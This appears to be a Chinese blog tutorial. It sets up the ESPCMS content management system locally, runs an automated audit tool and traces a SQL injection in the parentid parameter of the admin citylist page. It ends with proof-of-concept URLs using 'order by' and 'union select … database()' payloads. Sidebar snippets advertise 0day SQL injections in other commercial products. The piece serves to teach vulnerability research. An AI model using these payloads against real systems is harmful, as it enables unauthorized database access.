【安全】P 2-22 SQL注入漏洞简单挖掘 - 代码审计挖掘0day

最新推荐文章于 2024-04-02 16:13:02 发布
最新推荐文章于 2024-04-02 16:13:02 发布
阅读量358 收藏 1
点赞数 1
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113820703
版权

目录

0X01 CMS环境搭建(espcms)

下载地址
下载后解压到WWW目录下
在这里插入图片描述
浏览器访问http://127.0.0.1/espcms/upload/index.php进行安装
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
设置相关信息
在这里插入图片描述
在这里插入图片描述
安装完成,进行登录
在这里插入图片描述
在这里插入图片描述

正常访问,完成搭建
在这里插入图片描述

0X02 自动化审计工具

作者网站现在已经无法访问:http://www.cnseay.com/
github下载地址
CSDN下载地址
在这里插入图片描述

点击“新建项目”,打开espcms目录,再点:自动审计->开始
在这里插入图片描述
在这里插入图片描述

0X03 直接挖掘select注入

已这条漏洞提示为例
在这里插入图片描述

双击达到位置
在这里插入图片描述

parentid是通过accept函数获得的,我们定位函数
在这里插入图片描述

看到有两条路径
在这里插入图片描述

通过双击查看,发现有一个提交参数过滤机制,定位函数
在这里插入图片描述

找到函数
在这里插入图片描述
在这里插入图片描述

判断这不是一个字符注入
接下来执行函数,首先对important类进行全局搜索
在这里插入图片描述

看到第一条路径是初始化,双击打开
在这里插入图片描述
在这里插入图片描述

分析源码
在这里插入图片描述

首先获得archive,如果为空就使用adminuser
action同理
也就是说函数在citylist下获得内容,传参为parentid

构造url,访问index.php进行测试

0X04 漏洞验证POC

url 测试

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=1

在这里插入图片描述

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=1%20order%20by%206

在这里插入图片描述

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,3,4,5

在这里插入图片描述

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,database(),4,5

在这里插入图片描述

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
专栏目录
0day漏洞-用友NC Cloud系统attendScript接口存在SQL注入漏洞
weixin_43167326的博客
03-20 888
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。该系统runscript 接口存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器敏感信息,最终导致服务器失陷。
0day漏洞含POC-用友NC base64接口存在SQL注入漏洞
weixin_43167326的博客
03-18 993
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。用友NC base64接口存在SQL注入漏洞
0DAY挖掘巧思-代码执行之漏洞审计-漏洞银行大咖面对面35-水清云影
01-25
来源:漏洞银行大咖面对面技术直播35期 作者:水清云影
0day】号卡sql注入
最新发布
qq_69775412的博客
04-02 148
号卡系统一键即可便捷快速的为您自己打造一个独立的属于你的号卡分销商城。此系统某接口存在SQL注入漏洞
0day-畅捷通T+ preload新接口存在SQL注入漏洞
weixin_43167326的博客
03-26 551
畅捷通T+的InitServerInfo.aspx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
50:代码审计-PHP无框架项目SQL注入挖掘技巧
mingyqf的博客
01-13 1141
代码审计思维导图: 代码审计简介: **教学计划:**审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞 **教学内容:**PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用 **必备知识点:**环境安装搭建使用,相关工具插件安装使用,掌握前期各种漏洞原理及利用 **开始前准备:**审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等 **挖掘漏洞根本:**可控变量及特定函数,不存在过滤或过滤不严谨存在绕过导致的安全漏洞 漏洞
SQLI Hunter v1.2:用于扫描 Sql 注入漏洞的自动化工具。-开源
05-30
SQLI Hunter 是一种自动化工具,用于扫描网站中的 Sql 注入漏洞。 它使用 google dorks 自动从 Google 搜索 sqli 易受攻击的链接! SQLI Hunter 还可以通过使用一些预定义的管理页面列表来查找任何网站的管理页面。 快速和容易使用 ! ================ 由 MAK 编码 ================
BlueCMS-0day代码审计
孤桜懶契
04-17 704
代码审计的思路 代码审计核心在于通过源代码,知道代码如何执行,然后根据代码执行中可能产生的问题来寻找漏洞代码审计一般泛指白盒审计,但是要记住,通用性漏洞,例如CMS通杀漏洞,其实并不是仅仅只有代码审计能好到,本地搭建然后纯黑盒测试也可以的。只不过代码审计更为全面的容易找到漏洞 代码审计其实思路很简单,一共两条路线,全文通读和敏感函数定位。 全文通读:我看了每一行代码不是还不够清楚吗? 敏感函数定位:掌握住可以存在危险函数的地方 反推 渗透测试人员 -> 渗透测试 -> 找漏洞 -&
php asp 0day挖掘指南
09-23
4. ASP 0day漏洞挖掘: - IIS服务器漏洞:由于ASP常与IIS结合,所以要关注IIS的配置错误和漏洞。 - .NET框架漏洞:ASP.NET是ASP的升级版,其框架内的漏洞也可能影响ASP应用。 - 类库分析:检查ASP代码中引用的...
细说漏洞挖掘
bluemoon_0的博客
03-13 192
细说漏洞挖掘
Audit-Learning:记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获
02-01
Audit-Learning:记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获
初识0day漏洞以及SQL错误盲注
tainqiuer123的博客
04-13 538
一、小知识 有时把攻击这种刚刚被patch过的漏洞称为1day攻击。(patch发布后1天,叫做1day,5天叫做5day,未发patch统称0day漏洞的测试过程:漏洞挖掘漏洞分析、漏洞利用 二、工具: ollydbg动态调试工具 IDA pro静态反汇编工具 三、公布漏洞的权威机构 CVE(Common Vulnerabiliities and Expsures) http://cve.mitre.com/ CERT(Computer Emergency Response Te
代码审计XSS 0day
zhangge3663的博客
02-18 185
个人技术能力问题,先从xss挖! 步骤一:使用rips进行自动化审计 感觉这个好搞 步骤二:使用vscode看 Rips提示57行有洞 复制出来看: echo '<div id="douFrame"><div class="bg" onclick="douRemove('."'douFrame'".')"></div><div class="frame details"><h2><a href="javascript:v
p神 代码审计知识星球二周年wp[1]
weixin_34372728的博客
11-27 2027
题目:https://code-breaking.com 参考文献:https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.htmlhttps://blog.csdn.net/while0/artic...
java代码审计文件包含_代码审计:dedecms本地文件包含及物理路径泄露0day[转]
weixin_35132022的博客
03-02 194
晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯)出现漏洞的两个文件为:Include/payment/alipay.phpInclude/payment/yeepay.php漏洞均出现在respond方法里,估计这两个文件是临时工写的。Incl...
p神 代码审计知识星球二周年wp[2]
weixin_33852020的博客
12-05 788
参考文献:https://m3lon.github.io/2018/05/29/RCTF-r-cursive-wp/http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/ 递归匹配:http:...
一道代码审计
silence1_的博客
10-31 546
利用php伪协议写文件 题目是p神的code-breaking中的phpmagic。 先?read-source=1可以读到源码 php内容为: <?php if(isset($_GET['read-source'])) { exit(show_source(__FILE__)); } define('DATA_DIR', dirname(__FILE__) . '/data/' ...
PHP代码审计(全)
sechelper的博客
12-07 3894
PHP代码审计全流程,黑白盒测试,小技巧,实操案例
代码审计从入门到放弃(二) & pcrewaf
蚁景网安学院
03-19 435
前言 继续之前的2018 Code Breaking,这次是一道关于php回溯bypass正则的题目:pcrewaf 题目概述 题目源码如下 <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(empty($_FILES)) { die(show_so...
WEB漏洞挖掘SQL注入与绕过策略解析
"这篇演讲主要探讨了SQL注入作为WEB常见漏洞的一种,以及其挖掘和防范技术。演讲者通过实例分析了SQL注入的产生原因、常见案例,并提到了其他类型的...定期的安全审计、代码审查和持续的漏洞挖掘是确保系统安全的关键。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值